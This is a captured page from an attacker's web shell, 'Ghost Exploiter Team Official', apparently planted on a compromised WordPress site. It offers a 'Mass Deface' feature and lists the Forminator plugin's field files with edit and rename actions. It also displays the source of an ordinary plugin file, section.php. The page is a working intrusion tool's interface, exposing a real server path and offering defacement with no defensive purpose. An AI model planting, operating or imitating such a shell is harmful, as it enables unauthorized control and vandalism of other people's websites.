webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
aminiwrc
/
public_html11
/
wp-content
/
plugins
/
forminator
/
library
/
fields
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
address.php
26.927KB
edt
ren
calculation.php
8.044KB
edt
ren
captcha.php
7.759KB
edt
ren
consent.php
6.103KB
edt
ren
currency.php
12.955KB
edt
ren
custom.php
6.987KB
edt
ren
date.php
43.877KB
edt
ren
email.php
7.307KB
edt
ren
gdprcheckbox.php
5.331KB
edt
ren
group.php
6.532KB
edt
ren
hidden.php
5.317KB
edt
ren
html.php
2.13KB
edt
ren
multivalue.php
13.846KB
edt
ren
name.php
22.329KB
edt
ren
number.php
13.272KB
edt
ren
page-break.php
1.479KB
edt
ren
password.php
18.487KB
edt
ren
paypal.php
13.385KB
edt
ren
phone.php
15.011KB
edt
ren
postdata.php
35.285KB
edt
ren
radio.php
14.518KB
edt
ren
rating.php
5.415KB
edt
ren
section.php
3.119KB
edt
ren
select.php
19.787KB
edt
ren
slider.php
11.866KB
edt
ren
stripe-payment-element.php
3.852KB
edt
ren
stripe.php
42.271KB
edt
ren
text.php
11.142KB
edt
ren
textarea.php
11.191KB
edt
ren
time.php
28.063KB
edt
ren
upload.php
32.722KB
edt
ren
website.php
8.09KB
edt
ren
<?php /** * The Forminator_Section class. * * @package Forminator */ if ( ! defined( 'ABSPATH' ) ) { die(); } /** * Class Forminator_Section * * @since 1.0 */ class Forminator_Section extends Forminator_Field { /** * Name * * @var string */ public $name = ''; /** * Slug * * @var string */ public $slug = 'section'; /** * Type * * @var string */ public $type = 'section'; /** * Position * * @var int */ public $position = 20; /** * Options * * @var string */ public $options = array(); /** * Icon * * @var string */ public $icon = 'sui-icon-inlinecss'; /** * Forminator_Section constructor. * * @since 1.0 */ public function __construct() { parent::__construct(); $this->name = esc_html__( 'Section', 'forminator' ); } /** * Field defaults * * @since 1.0 * @return array */ public function defaults() { return array( 'section_title' => esc_html__( 'Form Section', 'forminator' ), 'cform-section-border-style' => 'none', ); } /** * Autofill Setting * * @since 1.0.5 * * @param array $settings Settings. * * @return array */ public function autofill_settings( $settings = array() ) { // Unsupported Autofill. $autofill_settings = array(); return $autofill_settings; } /** * Field front-end markup * * @since 1.0 * * @param array $field Field. * @param Forminator_Render_Form $views_obj Forminator_Render_Form object. * * @return mixed */ public function markup( $field, $views_obj ) { $this->field = $field; $html = ''; $id = self::get_property( 'element_id', $field ); $id = $id . '-field'; $title = esc_html( self::get_property( 'section_title', $field ) ); $subtitle = esc_html( self::get_property( 'section_subtitle', $field ) ); $border = self::get_property( 'section_border', $field, 'none' ); $border_width = self::get_property( 'cform-section-border-width', $field, 1 ); $border_color = self::get_property( 'cform-section-border-color', $field, 1 ); $html .= '<div class="forminator-field">'; if ( ! empty( $title ) ) { $title = wp_specialchars_decode( $title ); $html .= sprintf( '<h2 class="forminator-title">%s</h2>', $this->sanitize_output( $title ) ); } if ( ! empty( $subtitle ) ) { $subtitle = wp_specialchars_decode( $subtitle ); $html .= sprintf( '<h3 class="forminator-subtitle">%s</h3>', $this->sanitize_output( $subtitle ) ); } if ( 'none' !== $border ) { $border_width = self::get_property( 'cform-section-border-width', $field, 1 ); $border_color = self::get_property( 'cform-section-border-color', $field, 1 ); $html .= sprintf( '<hr class="forminator-border" style="border: %s %s %s;" />', $border_width . 'px', $border, $border_color ); } $html .= '</div>'; return apply_filters( 'forminator_field_section_markup', $html, $field ); } /** * Return sanitized form data * * @since 1.0 * * @param string $content Content. * * @return mixed */ public function sanitize_output( $content ) { return esc_html( $content ); } }
<=Back
Liking